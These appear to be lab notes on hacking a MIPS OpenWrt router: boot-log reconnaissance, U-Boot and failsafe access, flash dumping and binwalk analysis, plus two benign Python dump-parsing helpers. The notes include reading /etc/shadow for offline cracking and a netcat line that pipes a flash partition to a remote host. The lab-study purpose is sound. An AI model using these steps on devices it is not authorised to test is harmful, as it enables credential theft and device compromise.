Routers
Sagemcom F@st 3890 exploit (Lyrebirds):
https://github.com/Lyrebirds/sagemcom-fast-3890-exploit
Technicolor TC7230 exploit (Lyrebirds):
https://github.com/Lyrebirds/technicolor-tc7230-exploit
Public Exploits
- Hacking Routers
- Extensively Adaptable Exploits and Tools for Encroaching on Router Security
- juniper-pulse-flaw
- Cisco Smart Install Exploitation Tool
- SAP Vulnerabilities
- VxWorks' TCP/IP stack (IPnet)
- Pulse Connect Secure - CVE-2019-11510
MIPS
MIPS cores have separate L1 instruction and data caches. Shellcode that has just been written into memory sits in the data cache and is not seen by the instruction cache until it is flushed, so freshly written code can end up executing stale bytes. The usual workaround is to call sleep() before jumping to the shellcode, since the context switch flushes the caches. The same applies on ARM.
Getting Information
Check the boot log for interesting information, including:
- Flash chip used (gives the size of the chip)
- Kernel boot location
- Memory map
Boot log:
U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)
SoC:MediaTek MT7620
DRAM: Memory Testing..65536K OK. is 64 MB
relocate_code Pointer at: 83fb0000
enable ephy clock...done. rf reg 29 = 5
SSC disabled.
******************************
Software System Reset Occurred
******************************
spi_wait_nsec: 29
spi device id: ef 40 17 0 0 (40170000)
Flash: W25Q64BV
*** Warning - bad CRC, using default environment
_______________________________________________________________
| ____ _ ____ |
| | _ \ __ _ _ __ __| | ___ _ __ __ _| __ ) _____ __ |
| | |_) / _` | '_ \ / _` |/ _ \| '__/ _` | _ \ / _ \ \/ / |
| | __/ (_| | | | | (_| | (_) | | | (_| | |_) | (_) > < |
| |_| \__,_|_| |_|\__,_|\___/|_| \__,_|____/ \___/_/\_\ |
| |
| Ralink/MTK SDK Plantform |
| Copyright 2005-2013 |
| Board:ZBT WR8305RT |
===============System Info==================
ASIC 7620_MP (Port5<->None)
DRAM component: 512 Mbits DDR, width 16
DRAM bus: 16 bit
Flash component: SPI Flash
CPU Speed: 580 MHZ
RAM Size:64 Mbytes
Build Date:Dec 9 2015 Time:14:00:36
============================================
GSW VLAN:LLLW
GPIO Init:
UARTF_SHARE_MODE:GPIO
I2C_GPIO_MODE:GPIO
init gpio20!
GPIO_MODE_REG:0x1a311d
ReadyLED Bit:0x1
Please choose the operation:
1: Load system code to SDRAM via TFTP.
2: Load system code then write to Flash via TFTP.
3: Boot system code via Flash (default).
4: Entr boot command line interface.
7: Load Boot Loader code then write to Flash via Serial.
9: Load Boot Loader code then write to Flash via TFTP. 0
3: System Boot system code via Flash.
Press Reset button enter upgrade mode!
## Booting image at bc050000 ...
Image Name: MIPS OpenWrt Linux-3.18.36
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 1138908 Bytes = 1.1 MB
Load Address: 80000000
Entry Point: 80000000
Verifying Checksum ... OK
Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 80000000) ...
## Giving linux memsize in MB, 64
Starting kernel ...
[ 0.000000] Linux version 3.18.36 (joefitz@linuxps) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r49404) ) #12 Mon Sep 12 21:47:16 PDT 2016
[ 0.000000] Board has DDR2
[ 0.000000] Analog PMU set to hw control
[ 0.000000] Digital PMU set to hw control
[ 0.000000] SoC Type: MediaTek MT7620N ver:2 eco:6
[ 0.000000] bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 00019650 (MIPS 24KEc)
[ 0.000000] MIPS: machine is ZBT WR8305RT
[ 0.000000] Determined physical RAM map:
[ 0.000000] memory: 04000000 @ 00000000 (usable)
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x00000000-0x03ffffff]
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x00000000-0x03ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x00000000-0x03ffffff]
[ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256
[ 0.000000] Kernel command line: console=ttyS0,115200 rootfstype=squashfs,jffs2
[ 0.000000] PID hash table entries: 256 (order: -2, 1024 bytes)
[ 0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.000000] Writing ErrCtl register=00056700
[ 0.000000] Readback ErrCtl register=00056700
[ 0.000000] Memory: 61372K/65536K available (2515K kernel code, 124K rwdata, 516K rodata, 164K init, 186K bss, 4164K reserved)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] NR_IRQS:256
[ 0.000000] CPU Clock: 580MHz
[ 0.000000] systick: running - mult: 214748, shift: 32
[ 0.000000] Calibrating delay loop... 385.84 BogoMIPS (lpj=1929216)
[ 0.060000] pid_max: default: 32768 minimum: 301
[ 0.060000] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.070000] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.070000] pinctrl core: initialized pinctrl subsystem
[ 0.080000] NET: Registered protocol family 16
[ 0.100000] rt2880_gpio 10000600.gpio: registering 24 gpios
[ 0.100000] rt2880_gpio 10000600.gpio: registering 24 irq handlers
[ 0.110000] rt2880_gpio 10000638.gpio: registering 16 gpios
[ 0.110000] rt2880_gpio 10000638.gpio: registering 16 irq handlers
[ 0.120000] rt2880_gpio 10000688.gpio: registering 1 gpios
[ 0.120000] rt2880_gpio 10000688.gpio: registering 1 irq handlers
[ 0.130000] Switched to clocksource systick
[ 0.130000] NET: Registered protocol family 2
[ 0.140000] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.140000] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.150000] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.150000] TCP: reno registered
[ 0.160000] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.160000] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.170000] NET: Registered protocol family 1
[ 0.170000] rt-timer 10000100.timer: maximum frequency is 2441Hz
[ 0.180000] futex hash table entries: 256 (order: -1, 3072 bytes)
[ 0.200000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.200000] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.210000] msgmni has been set to 119
[ 0.230000] io scheduler noop registered
[ 0.230000] io scheduler deadline registered (default)
[ 0.230000] ralink-usb-phy usbphy: invalid resource
[ 0.240000] Serial: 8250/16550 driver, 2 ports, IRQ sharing disabled
[ 0.250000] console [ttyS0] disabled
[ 0.250000] 10000c00.uartlite: ttyS0 at MMIO 0x10000c00 (irq = 20, base_baud = 2500000) is a 16550A
[ 0.260000] console [ttyS0] enabled
[ 0.260000] console [ttyS0] enabled
[ 0.270000] bootconsole [early0] disabled
[ 0.270000] bootconsole [early0] disabled
[ 0.280000] m25p80 spi32766.0: found s25fl064k, expected mx25l6405d
[ 0.290000] m25p80 spi32766.0: s25fl064k (8192 Kbytes)
[ 0.290000] 4 ofpart partitions found on MTD device spi32766.0
[ 0.300000] Creating 4 MTD partitions on "spi32766.0":
[ 0.300000] 0x000000000000-0x000000030000 : "u-boot"
[ 0.310000] 0x000000030000-0x000000040000 : "u-boot-env"
[ 0.320000] 0x000000040000-0x000000050000 : "factory"
[ 0.320000] 0x000000050000-0x000000800000 : "firmware"
[ 0.390000] 2 uimage-fw partitions found on MTD device firmware
[ 0.390000] 0x000000050000-0x00000016611c : "kernel"
[ 0.400000] 0x00000016611c-0x000000800000 : "rootfs"
[ 0.400000] mtd: device 5 (rootfs) set to be root filesystem
[ 0.410000] 1 squashfs-split partitions found on MTD device rootfs
[ 0.420000] 0x000000340000-0x000000800000 : "rootfs_data"
[ 0.430000] ralink_soc_eth 10100000.ethernet: loaded mt7620 driver
[ 0.430000] ralink_soc_eth 10100000.ethernet eth0: ralink at 0xb0100000, irq 5
[ 0.440000] rt2880_wdt 10000120.watchdog: Initialized
[ 0.450000] TCP: cubic registered
[ 0.450000] NET: Registered protocol family 17
[ 0.450000] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[ 0.470000] 8021q: 802.1Q VLAN Support v1.8
[ 0.490000] VFS: Mounted root (squashfs filesystem) readonly on device 31:5.
[ 0.500000] Freeing unused kernel memory: 164K (80317000 - 80340000)
[ 3.000000] init: Console is alive
[ 3.000000] init: - watchdog -
[ 5.300000] usbcore: registered new interface driver usbfs
[ 5.300000] usbcore: registered new interface driver hub
[ 5.310000] usbcore: registered new device driver usb
[ 5.320000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 5.330000] ehci-platform: EHCI generic platform driver
[ 5.340000] phy phy-usbphy.0: remote usb device wakeup disabled
[ 5.350000] phy phy-usbphy.0: UTMI 16bit 30MHz
[ 5.350000] ehci-platform 101c0000.ehci: EHCI Host Controller
[ 5.360000] ehci-platform 101c0000.ehci: new USB bus registered, assigned bus number 1
[ 5.370000] ehci-platform 101c0000.ehci: irq 26, io mem 0x101c0000
[ 5.390000] ehci-platform 101c0000.ehci: USB 2.0 started, EHCI 1.00
[ 5.390000] hub 1-0:1.0: USB hub found
[ 5.400000] hub 1-0:1.0: 1 port detected
[ 5.400000] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 5.410000] ohci-platform: OHCI generic platform driver
[ 5.420000] ohci-platform 101c1000.ohci: Generic Platform OHCI controller
[ 5.420000] ohci-platform 101c1000.ohci: new USB bus registered, assigned bus number 2
[ 5.430000] ohci-platform 101c1000.ohci: irq 26, io mem 0x101c1000
[ 5.500000] hub 2-0:1.0: USB hub found
[ 5.500000] hub 2-0:1.0: 1 port detected
[ 6.000000] init: - preinit -
[ 6.630000] 8021q: adding VLAN 0 to HW filter on device eth0
[ 6.680000] random: mktemp urandom read with 10 bits of entropy available
Press the [�] key and hit [enter] to enter failsafe mode
Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level
[ 8.050000] jffs2: notice: (301) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found.
[ 8.070000] mount_root: switching to jffs2 overlay
[ 8.110000] procd: - early -
[ 8.110000] procd: - watchdog -
[ 9.050000] procd: - ubus -
[ 10.070000] procd: - init -
Please press Enter to activate this console.
[ 10.830000] NET: Registered protocol family 10
[ 10.840000] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 10.860000] Loading modules backported from Linux version v4.4-rc5-1913-gc8fdf68
[ 10.870000] Backport generated by backports.git backports-20151218-0-g2f58d9d
[ 10.880000] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 10.900000] nf_conntrack version 0.5.0 (961 buckets, 3844 max)
[ 10.940000] xt_time: kernel timezone is -0000
[ 11.030000] PPP generic driver version 2.4.2
[ 11.040000] NET: Registered protocol family 24
[ 11.080000] ieee80211 phy0: rt2x00_set_rt: Info - RT chipset 5390, rev 0500 detected
[ 11.090000] ieee80211 phy0: rt2x00_set_rf: Info - RF chipset 7620 detected
[ 17.230000] 8021q: adding VLAN 0 to HW filter on device eth0
[ 17.250000] device eth0.1 entered promiscuous mode
[ 17.250000] device eth0 entered promiscuous mode
[ 17.270000] br-lan: port 1(eth0.1) entered forwarding state
[ 17.270000] br-lan: port 1(eth0.1) entered forwarding state
[ 19.270000] br-lan: port 1(eth0.1) entered forwarding state
Get File System Data:
root@OpenWrt:~# cat /proc/mtd
dev: size erasesize name
mtd0: 00030000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00010000 00010000 "factory"
mtd3: 007b0000 00010000 "firmware"
mtd4: 0011611c 00010000 "kernel"
mtd5: 00699ee4 00010000 "rootfs"
mtd6: 004c0000 00010000 "rootfs_data"
root@OpenWrt:~# df -h
Filesystem Size Used Available Use% Mounted on
rootfs 4.8M 276.0K 4.5M 6% /
/dev/root 2.0M 2.0M 0 100% /rom
tmpfs 30.0M 56.0K 30.0M 0% /tmp
/dev/mtdblock6 4.8M 276.0K 4.5M 6% /overlay
overlayfs:/overlay 4.8M 276.0K 4.5M 6% /
tmpfs 512.0K 0 512.0K 0% /dev
root@OpenWrt:~# mount
rootfs on / type rootfs (rw)
/dev/root on /rom type squashfs (ro,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,noatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,noatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noatime)
/dev/mtdblock6 on /overlay type jffs2 (rw,noatime)
overlayfs:/overlay on / type overlay (rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work)
tmpfs on /dev type tmpfs (rw,nosuid,relatime,size=512k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600)
debugfs on /sys/kernel/debug type debugfs (rw,noatime)
root@OpenWrt:~# ls -al /dev/mtd*
crw-r--r-- 1 root root 90, 0 Jan 1 1970 /dev/mtd0
crw-r--r-- 1 root root 90, 1 Jan 1 1970 /dev/mtd0ro
crw-r--r-- 1 root root 90, 2 Jan 1 1970 /dev/mtd1
crw-r--r-- 1 root root 90, 3 Jan 1 1970 /dev/mtd1ro
crw-r--r-- 1 root root 90, 4 Jan 1 1970 /dev/mtd2
crw-r--r-- 1 root root 90, 5 Jan 1 1970 /dev/mtd2ro
crw-r--r-- 1 root root 90, 6 Jan 1 1970 /dev/mtd3
crw-r--r-- 1 root root 90, 7 Jan 1 1970 /dev/mtd3ro
crw-r--r-- 1 root root 90, 8 Jan 1 1970 /dev/mtd4
crw-r--r-- 1 root root 90, 9 Jan 1 1970 /dev/mtd4ro
crw-r--r-- 1 root root 90, 10 Jan 1 1970 /dev/mtd5
crw-r--r-- 1 root root 90, 11 Jan 1 1970 /dev/mtd5ro
crw-r--r-- 1 root root 90, 12 Jan 1 1970 /dev/mtd6
crw-r--r-- 1 root root 90, 13 Jan 1 1970 /dev/mtd6ro
brw-r--r-- 1 root root 31, 0 Jan 1 1970 /dev/mtdblock0
brw-r--r-- 1 root root 31, 1 Jan 1 1970 /dev/mtdblock1
brw-r--r-- 1 root root 31, 2 Jan 1 1970 /dev/mtdblock2
brw-r--r-- 1 root root 31, 3 Jan 1 1970 /dev/mtdblock3
brw-r--r-- 1 root root 31, 4 Jan 1 1970 /dev/mtdblock4
brw-r--r-- 1 root root 31, 5 Jan 1 1970 /dev/mtdblock5
brw-r--r-- 1 root root 31, 6 Jan 1 1970 /dev/mtdblock6
U-Boot Attacks
https://research.nccgroup.com/2020/07/22/depthcharge/
Boot into U-Boot Mode
Press 4 at the boot menu to enter the U-Boot command line interface:
U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)
SoC:MediaTek MT7620
DRAM: Memory Testing..65536K OK. is 64 MB
relocate_code Pointer at: 83fb0000
enable ephy clock...done. rf reg 29 = 5
SSC disabled.
******************************
Software System Reset Occurred
******************************
spi_wait_nsec: 29
spi device id: ef 40 17 0 0 (40170000)
Flash: W25Q64BV
*** Warning - bad CRC, using default environment
_______________________________________________________________
| ____ _ ____ |
| | _ \ __ _ _ __ __| | ___ _ __ __ _| __ ) _____ __ |
| | |_) / _` | '_ \ / _` |/ _ \| '__/ _` | _ \ / _ \ \/ / |
| | __/ (_| | | | | (_| | (_) | | | (_| | |_) | (_) > < |
| |_| \__,_|_| |_|\__,_|\___/|_| \__,_|____/ \___/_/\_\ |
| |
| Ralink/MTK SDK Plantform |
| Copyright 2005-2013 |
| Board:ZBT WR8305RT |
===============System Info==================
ASIC 7620_MP (Port5<->None)
DRAM component: 512 Mbits DDR, width 16
DRAM bus: 16 bit
Flash component: SPI Flash
CPU Speed: 580 MHZ
RAM Size:64 Mbytes
Build Date:Dec 9 2015 Time:14:00:36
============================================
GSW VLAN:LLLW
GPIO Init:
UARTF_SHARE_MODE:GPIO
I2C_GPIO_MODE:GPIO
init gpio20!
GPIO_MODE_REG:0x1a311d
ReadyLED Bit:0x1
Please choose the operation:
1: Load system code to SDRAM via TFTP.
2: Load system code then write to Flash via TFTP.
3: Boot system code via Flash (default).
4: Entr boot command line interface.
7: Load Boot Loader code then write to Flash via Serial.
9: Load Boot Loader code then write to Flash via TFTP.
You choosed 4
0
4: System Enter Boot Command Line Interface.
U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)
MT7620 #
Modify Kernel Boot Parameters
Get the kernel boot address from the boot log (the "Booting image at" line):
[...]
Press Reset button enter upgrade mode!
## Booting image at bc050000 ...
Image Name: MIPS OpenWrt Linux-3.18.36
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 1138908 Bytes = 1.1 MB
Load Address: 80000000
Entry Point: 80000000
Verifying Checksum ... OK
Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 80000000) ...
## Giving linux memsize in MB, 64
[...]
Change Kernel Boot Options:
MT7620 # setenv bootargs console=ttyS0,115200 rootfstype=squashfs,jffs2 1 single
MT7620 # bootm bc050000
Checking whether the new boot options are set:
user@OpenWrt:~$ cat /proc/cmdline
console=ttyS0,115200 rootfstype=squashfs,jffs2
Since /proc/cmdline does not show the arguments passed with setenv, the boot options are hard-coded into the kernel and the bootloader's bootargs are ignored.
Start Failsafe Mode
Failsafe mode is selected by failsafe=true in the kernel arguments (the preinit script greps /proc/cmdline for failsafe=), or by pressing the key the script prints during boot:
user@OpenWrt:~$ cat /lib/preinit/30_failsafe_wait
#!/bin/sh
# Copyright (C) 2006-2010 OpenWrt.org
# Copyright (C) 2010 Vertical Communications

fs_wait_for_key () {
    local timeout=$3
    local timer
    local do_keypress
    local keypress_true="$(mktemp)"
    local keypress_wait="$(mktemp)"
    local keypress_sec="$(mktemp)"
    if [ -z "$keypress_wait" ]; then
        keypress_wait=/tmp/.keypress_wait
        touch $keypress_wait
    fi
    if [ -z "$keypress_true" ]; then
        keypress_true=/tmp/.keypress_true
        touch $keypress_true
    fi
    if [ -z "$keypress_sec" ]; then
        keypress_sec=/tmp/.keypress_sec
        touch $keypress_sec
    fi
    trap "echo 'true' >$keypress_true; lock -u $keypress_wait ; rm -f $keypress_wait" INT
    trap "echo 'true' >$keypress_true; lock -u $keypress_wait ; rm -f $keypress_wait" USR1
    [ -n "$timeout" ] || timeout=1
    [ $timeout -ge 1 ] || timeout=1
    timer=$timeout
    lock $keypress_wait
    {
        while [ $timer -gt 0 ]; do
            echo "$timer" >$keypress_sec
            timer=$(($timer - 1))
            sleep 1
        done
        lock -u $keypress_wait
        rm -f $keypress_wait
    } &
    echo "Press the [$1] key and hit [enter] $2"
    echo "Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level"
    # if we're on the console we wait for input
    {
        while [ -r $keypress_wait ]; do
            timer="$(cat $keypress_sec)"
            [ -n "$timer" ] || timer=1
            timer="${timer%%\ *}"
            [ $timer -ge 1 ] || timer=1
            do_keypress=""
            {
                read -t "$timer" do_keypress
                case "$do_keypress" in
                    $1)
                        echo "true" >$keypress_true
                        ;;
                    1 | 2 | 3 | 4)
                        echo "$do_keypress" >/tmp/debug_level
                        ;;
                    *)
                        continue;
                        ;;
                esac
                lock -u $keypress_wait
                rm -f $keypress_wait
            }
        done
    }
    lock -w $keypress_wait
    keypressed=1
    [ "$(cat $keypress_true)" = "true" ] && keypressed=0
    rm -f $keypress_true
    rm -f $keypress_wait
    rm -f $keypress_sec
    return $keypressed
}

failsafe_wait() {
    FAILSAFE=
    grep -q 'failsafe=' /proc/cmdline && FAILSAFE=true && export FAILSAFE
    if [ "$FAILSAFE" != "true" ]; then
        pi_failsafe_net_message=true
        preinit_net_echo "Please press button now to enter failsafe"
        pi_failsafe_net_message=false
        fs_wait_for_key � 'to enter failsafe mode' $fs_failsafe_wait_timeout && FAILSAFE=true
        [ -f "/tmp/failsafe_button" ] && FAILSAFE=true && echo "- failsafe button "`cat /tmp/failsafe_button`" was pressed -"
        [ "$FAILSAFE" = "true" ] && export FAILSAFE && touch /tmp/failsafe
    fi
}
Copy and paste the ASCII character shown in the failsafe prompt (the first argument passed to fs_wait_for_key) and hit enter:
# Read /etc/shadow (the hashes can then be cracked offline)
root@(none):/# cat /etc/shadow
root:$1$NJi50Ceq$H2TXojQhmmD/lS.I41mSp1:0:0:99999:7:::
root:$1$g1UlaVkd$ZNIs8OXZmUK.QQxY7IoAN/:0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
root@(none):/# cat /etc/passwd
root:x:0:0:root:/root:/bin/ash
user:x:1000:1000:user:/home/user:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
Dump Flash Memory over Serial
Using md to hexdump memory (md's count argument is in 32-bit words by default, so 0x800000 here reads well past the 8 MB flash):
MT7620 # md 0xbc000000 0x800000
bc050000: 56190527 d1c425c5 0285d757 dc601100 '..V.%..W.....`.
bc050010: 00000080 00000080 44146a2e 03020505 .........j.D....
bc050020: 5350494d 65704f20 7472576e 6e694c20 MIPS OpenWrt Lin
bc050030: 332d7875 2e38312e 00003633 00000000 ux-3.18.36......
bc050040: 8000006d 3385ec00 00000000 6f000000 m......3.......o
bc050050: a3fffffd 50707fb7 71cda0fd c8db6e7a ......pP...qzn..
bc050060: a28c7a75 7573249e dcad593b 5a6dbcb1 uz...$su;Y....mZ
bc050070: 42f3879e dec27823 331f7d35 cfa6026a ...B#x..5}.3j...
bc050080: f58a34da e133a7a0 e1970fd1 a510c171 .4....3.....q...
bc050090: 2646f598 82be5343 218d3a43 0a5f5f08 ..F&CS..C:.!.__.
bc0500a0: 6770a520 6c35647c 18b9db33 818fb3a2 .pg|d5l3.......
bc0500b0: 1afa0e21 11740474 13d7fd80 7188e196 !...t.t........q
bc0500c0: fc056267 eaac3daa ae355791 98ed0ac0 gb...=...W5.....
bc0500d0: 308fe3d2 538374c3 95ebd005 ab5ea0ad ...0.t.S......^.
bc0500e0: 01b13c96 00a55ed2 e731a898 5d04ee15 .<...^....1....]
bc0500f0: 60aee688 918f6548 ae118519 6591c4d3 ...`He.........e
Use the uart_mem_dump.py script (not reproduced here) to read the dump programmatically and correct the transmission errors a UART link can introduce.
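As an added example that is not part of the original notes: a Python parser for U-Boot md output that rebuilds the dumped bytes and reports every line that has to be re-read, which is the error handling a serial dump script needs. The MT7620 is a little-endian MIPS part, so md prints each 32-bit word as a little-endian number; packing each word back with '<I' restores the byte order the data has in flash (compare the first word 56190527 above with the 27 05 19 56 in the xxd listing of the same header further down the page). MD_DUMP is constructed from the dump above with one line dropped and one word truncated on purpose; parse_md, contiguous and looks_like_uimage are my own names.

```python
import re
import struct

UIMAGE_MAGIC = 0x27051956

# Constructed from the md output above: four real header lines, then the
# bc050040 line is left out and one word on the bc050060 line is truncated,
# the two kinds of damage a flaky UART link produces.
MD_DUMP = """\
bc050000: 56190527 d1c425c5 0285d757 dc601100    '..V.%..W.....`.
bc050010: 00000080 00000080 44146a2e 03020505    .........j.D....
bc050020: 5350494d 65704f20 7472576e 6e694c20    MIPS OpenWrt Lin
bc050030: 332d7875 2e38312e 00003633 00000000    ux-3.18.36......
bc050050: a3fffffd 50707fb7 71cda0fd c8db6e7a    ......pP...qzn..
bc050060: a28c7a75 7573249 dcad593b 5a6dbcb1    uz...$su;Y....mZ
"""

LINE_RE = re.compile(r"^([0-9a-fA-F]{8}):((?:\s+[0-9a-fA-F]+){1,4})")
MAX_GAP_LINES = 4096  # beyond this an address jump is treated as garbage, not a gap


def parse_md(text, base):
    """Rebuild memory contents from md output starting at address `base`.

    Returns (data, problems). `data` maps line address -> 16 bytes for every
    clean line; `problems` lists (address, reason) for every line that must
    be re-read, so damaged input is never silently zero-filled.
    """
    data, problems = {}, []
    expected = base
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            problems.append((expected, "unparseable line: %r" % raw))
            continue
        addr = int(m.group(1), 16)
        if addr > expected + 16 * MAX_GAP_LINES or addr < expected:
            problems.append((addr, "unexpected address: %r" % raw))
            continue
        # A dropped line shows up as an address jump: record each missing line
        while expected < addr:
            problems.append((expected, "missing line"))
            expected += 16
        words = m.group(2).split()
        if len(words) != 4 or any(len(w) != 8 for w in words):
            problems.append((addr, "malformed line: %r" % raw))
        else:
            # MT7620 is little-endian MIPS: md prints native words, so '<I'
            # restores the byte order the data has in flash
            data[addr] = b"".join(struct.pack("<I", int(w, 16)) for w in words)
        expected = addr + 16
    return data, problems


def contiguous(data, start, length):
    """Join clean lines into one buffer, or None if any needed line is absent."""
    out = bytearray()
    for addr in range(start, start + length, 16):
        if addr not in data:
            return None
        out += data[addr]
    return bytes(out[:length])


def looks_like_uimage(buf):
    """True if the buffer starts with the big-endian uImage magic."""
    return len(buf) >= 4 and struct.unpack(">I", buf[:4])[0] == UIMAGE_MAGIC


if __name__ == "__main__":
    data, problems = parse_md(MD_DUMP, 0xBC050000)
    for addr, why in problems:
        print("re-read 0x%08x: %s" % (addr, why))
    hdr = contiguous(data, 0xBC050000, 64)
    print("uImage header:", looks_like_uimage(hdr))
```

The returned problem list is what a dump script should feed back into a second md request for just those addresses, rather than patching holes with zeros and discovering the corruption later when binwalk or unsquashfs fails.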
Dump Partitions over Netcat
Receive the data on the host:
bridings@lupin3:~/GDS/Labs/hardware
>>> netcat -l -p 1234 > mtd0
Send the partition from the device using nc:
root@OpenWrt:~# cat /dev/mtd0 | nc 192.168.1.153 1234
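As an added example (mine, not from the original notes), a Python helper that ties together the two views of the flash layout from the Getting Information section, the kernel's MTD partition lines in the boot log and the /proc/mtd listing, and then checks that a partition dump received over netcat has exactly the expected length. It also makes two relationships in the listings explicit: the kernel partition (0x11611c bytes) is the 64-byte uImage header plus the 1138908-byte image, and rootfs starts at 0x16611c, which is not erase-block aligned and is why the repacking steps later on write with byte-granular dd seeks. KERNEL_LOG and PROC_MTD are constructed from the listings above; the function names are my own.

```python
import re

# Constructed from the boot log above: the kernel's MTD partition lines
KERNEL_LOG = """\
[    0.300000] 0x000000000000-0x000000030000 : "u-boot"
[    0.310000] 0x000000030000-0x000000040000 : "u-boot-env"
[    0.320000] 0x000000040000-0x000000050000 : "factory"
[    0.320000] 0x000000050000-0x000000800000 : "firmware"
[    0.390000] 0x000000050000-0x00000016611c : "kernel"
[    0.400000] 0x00000016611c-0x000000800000 : "rootfs"
[    0.420000] 0x000000340000-0x000000800000 : "rootfs_data"
"""

# Constructed from the /proc/mtd listing above
PROC_MTD = """\
dev:    size   erasesize  name
mtd0: 00030000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00010000 00010000 "factory"
mtd3: 007b0000 00010000 "firmware"
mtd4: 0011611c 00010000 "kernel"
mtd5: 00699ee4 00010000 "rootfs"
mtd6: 004c0000 00010000 "rootfs_data"
"""

LOG_RE = re.compile(r'0x([0-9a-f]+)-0x([0-9a-f]+) : "([^"]+)"')
PROC_RE = re.compile(r'^(mtd\d+): ([0-9a-f]{8}) ([0-9a-f]{8}) "([^"]+)"', re.M)


def parse_kernel_log(text):
    """Partition name -> (offset, size) from the kernel's MTD lines."""
    return {name: (int(start, 16), int(end, 16) - int(start, 16))
            for start, end, name in LOG_RE.findall(text)}


def parse_proc_mtd(text):
    """Partition name -> (device, size, erasesize) from /proc/mtd."""
    return {name: (dev, int(size, 16), int(erase, 16))
            for dev, size, erase, name in PROC_RE.findall(text)}


def flash_map(log_text, proc_text):
    """Join both views; 'consistent' is False when their sizes disagree."""
    by_log = parse_kernel_log(log_text)
    fmap = {}
    for name, (dev, size, erase) in parse_proc_mtd(proc_text).items():
        offset, log_size = by_log.get(name, (None, None))
        fmap[name] = {"dev": dev, "offset": offset, "size": size,
                      "erasesize": erase, "consistent": log_size == size}
    return fmap


def check_dump(fmap, name, dump):
    """True when a dump of partition `name` is exactly the expected length;
    a short read over nc or UART is the most common way a dump goes wrong."""
    return len(dump) == fmap[name]["size"]


if __name__ == "__main__":
    fmap = flash_map(KERNEL_LOG, PROC_MTD)
    for name, p in fmap.items():
        print("%-12s %s offset=0x%x size=0x%x consistent=%s"
              % (name, p["dev"], p["offset"], p["size"], p["consistent"]))
```

Feed check_dump the bytes of each received file before hashing or unpacking them; a dump that is short by even one byte will still look plausible to binwalk but will not match the device.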
Dump Flash Memory over TFTP
Start the TFTP service on the host and create a world-writable target file:
>>> systemctl start tftpd-hpa.service
>>> cd /srv/tftp/
>>> sudo touch firmware.bin
>>> sudo chmod 666 firmware.bin
>>> ls /srv/tftp -l
total 0
-rw-rw-rw- 1 root root 0 Jun 28 19:13 firmware.bin
Upload into the created file from the U-Boot prompt:
>>> tftp 0x82000000 firmware.bin 0x1000000
Modifying File Systems
Modifying a SquashFS Partition
Find the file system offsets with binwalk:
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
94560 0x17160 U-Boot version string, "U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)"
94904 0x172B8 HTML document header
95967 0x176DF HTML document footer
96090 0x1775A HTML document header
96294 0x17826 HTML document footer
96408 0x17898 HTML document header
96940 0x17AAC HTML document footer
97052 0x17B1C HTML document header
97497 0x17CD9 HTML document footer
98693 0x18185 Copyright string: "Copyright 2005-2013 |"
